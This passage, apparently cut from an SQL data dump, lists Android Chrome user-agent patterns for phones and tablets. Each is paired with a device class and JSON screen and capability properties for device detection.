Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-V405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-V450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-V500N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-V600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-X320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-X430) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-X520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-X525) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LM-X540) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LRA-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LYA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LYA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LYA-L0C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; LYA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Lenovo TB-8505F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Lenovo TB-8505X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Lenovo TB-X505F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Lenovo TB-X606F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Lenovo TB-X606X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2002J9E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2002J9G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2004J19C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2004J19PI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2006C3LI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2006C3LII) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2006C3LVG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2006C3MII) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2006C3MNG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2007J17G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2007J20CG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2007J20CI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2007J22G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2007J3SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2007J3SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2010J19CG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2010J19SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2010J19SL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; M2010J19SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX1A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX1B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX1H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX1M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX3A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MAR-LX3Bm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N; HMSCore 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N; HMSCore 5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N; HMSCore 5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N; HMSCore 5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N; HMSCore 6.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N; HMSCore 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MED-LX9N; HMSCore 6.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MI 8 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MI 8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":818,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MI 8 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":816,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MI 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":818,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MI 9 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MI 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MI MAX 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MIX 2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MOA-LX9N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MOA-LX9N; HMSCore 6.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; MOA-LX9N; HMSCore 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; N20Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; NOH-NX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":792,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; NOTE 20 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; NOTE 20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 1.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":811,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 2.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 2.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 2.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 2.4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 3.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 3.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 3.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 